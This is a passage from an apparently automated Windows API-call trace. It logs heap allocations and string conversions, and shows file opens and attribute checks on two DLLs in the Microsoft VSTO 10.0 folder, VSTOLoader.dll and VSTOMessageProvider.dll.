hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0087.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0087.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0087.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0087.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0087.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0087.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e3e8 [0087.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0087.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0087.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e3e8 | out: hHeap=0x20000) returned 1 [0087.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0087.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a660 [0087.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0087.794] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.794] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.794] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.794] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0087.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.794] AreFileApisANSI () returned 1 [0087.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll", lpUsedDefaultChar=0x0) returned 72 [0087.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0087.795] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.795] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0087.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0087.795] AreFileApisANSI () returned 1 [0087.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0087.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b078 [0087.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x8b078, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll") returned 72 [0087.795] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoloader.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0087.795] GetFileType (hFile=0x348) returned 0x1 [0087.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0087.795] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0087.796] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0087.796] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0087.796] CloseHandle (hObject=0x348) returned 1 [0087.796] AreFileApisANSI () returned 1 [0087.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0087.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ad80 [0087.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x8ad80, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll") returned 72 [0087.796] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoloader.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0087.796] GetFileType (hFile=0x348) returned 0x1 [0087.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0087.797] CloseHandle (hObject=0x348) returned 1 [0087.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0087.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0087.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0087.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0087.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0087.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0087.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0087.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0087.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0087.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0087.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0087.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0087.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0087.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0087.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dd90 [0087.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0087.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0087.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0087.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0087.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dd90 | out: hHeap=0x20000) returned 1 [0087.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0087.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0087.798] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0087.798] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0087.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0087.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0087.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0087.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0087.798] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0087.798] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0087.798] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.798] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0087.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0087.798] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0087.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.798] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0087.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0087.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0087.798] AreFileApisANSI () returned 1 [0087.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0087.798] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ace8 [0087.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x8ace8, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll") returned 72 [0087.798] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoloader.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbd6700, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4aebd53e, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5dbd6700, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x59a70)) returned 1 [0087.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0087.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0087.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0087.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0087.798] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.798] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.798] FindNextFileW (in: hFindFile=0x784d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbd6700, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4a6fdac8, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5dbd6700, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0xbee8, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="VSTOMessageProvider.dll", cAlternateFileName="VSTOME~1.DLL")) returned 1 [0087.798] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0087.798] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0087.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0087.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0087.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0087.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0087.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0087.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0087.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0087.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0087.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0087.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0087.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0087.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0087.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0087.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0087.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0087.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0087.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0087.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0087.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0087.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0087.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0087.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0087.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x819d0 [0087.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0087.799] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.799] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.799] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.799] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x819d0 | out: hHeap=0x20000) returned 1 [0087.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0087.799] AreFileApisANSI () returned 1 [0087.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll", lpUsedDefaultChar=0x0) returned 81 [0087.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0087.799] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.799] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0087.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0087.800] AreFileApisANSI () returned 1 [0087.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71550, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 81 [0087.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa2) returned 0x60088 [0087.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71550, cbMultiByte=-1, lpWideCharStr=0x60088, cchWideChar=81 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll") returned 81 [0087.800] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstomessageprovider.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0087.800] GetFileType (hFile=0x348) returned 0x1 [0087.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0087.800] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0087.800] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0087.801] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0087.801] CloseHandle (hObject=0x348) returned 1 [0087.801] AreFileApisANSI () returned 1 [0087.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71550, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 81 [0087.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa2) returned 0x5fd18 [0087.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71550, cbMultiByte=-1, lpWideCharStr=0x5fd18, cchWideChar=81 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll") returned 81 [0087.801] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstomessageprovider.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0087.801] GetFileType (hFile=0x348) returned 0x1 [0087.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fd18 | out: hHeap=0x20000) returned 1 [0087.801] CloseHandle (hObject=0x348) returned 1 [0087.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0087.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0087.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0087.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0087.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0087.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0087.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0087.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0087.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0087.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0087.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0087.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0087.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0087.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0087.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0087.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0087.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0087.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0087.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0087.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0087.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0087.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0087.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0087.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0087.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0087.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0087.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0087.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dd90 [0087.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0087.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0087.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0087.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dd90 | out: hHeap=0x20000) returned 1 [0087.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0087.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0087.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0087.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0087.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0087.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0087.803] AreFileApisANSI () returned 1 [0087.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71550, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 81 [0087.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa2) returned 0x604a8 [0087.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71550, cbMultiByte=-1, lpWideCharStr=0x604a8, cchWideChar=81 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll") returned 81 [0087.803] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstomessageprovider.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: 